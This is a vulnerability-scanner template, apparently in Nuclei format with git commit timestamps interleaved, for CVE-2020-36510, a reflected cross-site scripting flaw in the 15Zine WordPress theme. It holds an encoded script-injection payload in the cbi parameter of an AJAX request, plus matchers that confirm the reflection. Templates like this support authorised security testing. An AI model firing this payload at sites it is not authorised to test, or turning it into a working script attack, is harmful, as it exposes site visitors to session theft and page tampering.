2022-05-11 12:50:11 +00:00
id : CVE-2020-36510
info :
name : 15Zine < 3.3.0 - Reflected Cross-Site Scripting
author : veshraj
severity : medium
description : |
2022-05-13 20:26:43 +00:00
The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting.
2022-05-11 12:50:11 +00:00
reference :
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510
2022-05-11 13:16:45 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2020-36510
cwe-id : CWE-79
2022-05-12 11:28:57 +00:00
metadata :
2022-05-12 11:30:02 +00:00
verified : false
2022-05-12 11:28:57 +00:00
tags : xss,wordpress,wp-theme,wp,cve,cve2020
2022-05-11 12:50:11 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-05-12 11:30:02 +00:00
- "</script><script>alert(document.domain)</script>"
2022-05-11 12:50:11 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200